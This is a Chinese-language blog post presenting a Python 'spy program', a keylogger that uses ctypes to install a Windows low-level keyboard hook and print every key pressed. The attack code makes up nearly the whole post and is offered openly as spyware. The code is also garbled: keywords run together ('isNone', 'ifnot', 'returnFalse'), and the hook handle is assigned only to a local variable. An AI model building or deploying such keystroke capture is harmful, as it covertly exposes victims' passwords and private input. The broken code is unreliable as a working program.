Python開發一個間諜小程序(呼叫DLL)

Python開發一個間諜小程序(呼叫DLL)

Python開發一個間諜小程序(呼叫DLL)


資料來源: https://mp.weixin.qq.com/s?__biz=MzA5MDUyODMzOA==&mid=2447782386&idx=1&sn=b6c1f2c968f8700696ee724143c7ed57&chksm=8418decfb36f57d92b7eeffd067c85679b3499108745e08140093206b0c35877da330b5edfb7&scene=126&sessionid=1582852049&key=b3900b1fc989b015fd343fa8d4c484ab44f6c33213d9b39f9ad0196a3bf151d0ba773bc905220a05e4290a64f12dae3ac819f5d18a46e07264343028d9b101e69302c73044b243dd9c69033c8fef8bb6&ascene=1&uin=MjIwODk2NDgxNw%3D%3D&devicetype=Windows+10&version=6208006f&lang=zh_TW&exportkey=Ai8KaubzyLCLk48kVXYl5Aw%3D&pass_ticket=f1r167TSzeNSJIaf54XAaVC645GEE8h4MiHMrDGRIBQpJA6itQa9PBaZWrd6upr6

import sys
from ctypes import *
from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")


class KBDLLHOOKSTRUCT(Structure):
    _fields_ = [
        ('vkCode', DWORD),
        ('scanCode', DWORD),
        ('flags', DWORD),
        ('time', DWORD),
        ('dwExtraInfo', DWORD)]


def uninstallHookProc(hooked):
    if hooked isNone:
        return
    user32.UnhookWindowsHookEx(hooked)
    hooked = None


def hookProc(nCode, wParam, lParam):
    if nCode < 0:
        return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
    else:
        if wParam == 256:
            if162 == lParam.contents.value:
                print("Ctrl pressed, call Hook uninstall()")
                uninstallHookProc(hooked)
                sys.exit(-1)
            capsLock = user32.GetKeyState(20)
            # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
            if lParam.contents.value==13:
                print("\n")
            elif capsLock:
                print(chr(lParam.contents.value),end="")
            else:
                print(chr(lParam.contents.value+32),end="")
    return user32.CallNextHookEx(hooked, nCode, wParam, lParam)


def startKeyLog():
    msg = MSG()
    user32.GetMessageA(byref(msg), 0, 0, 0)


def installHookProc(hooked, pointer):
    hooked = user32.SetWindowsHookExA(
        13,
        pointer,
        kernel32.GetModuleHandleW(),
        0
    )
    ifnot hooked:
        returnFalse
    returnTrue


HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):
    print("Hook installed")
    try:
        msg = MSG()
        user32.GetMessageA(byref(msg), 0, 0, 0)
    except KeyboardInterrupt as kerror:
        uninstallHookProc(hooked)
        print("Hook uninstall...")
else:
    print("Hook installed error")

發表迴響

你的電子郵件位址並不會被公開。 必要欄位標記為 *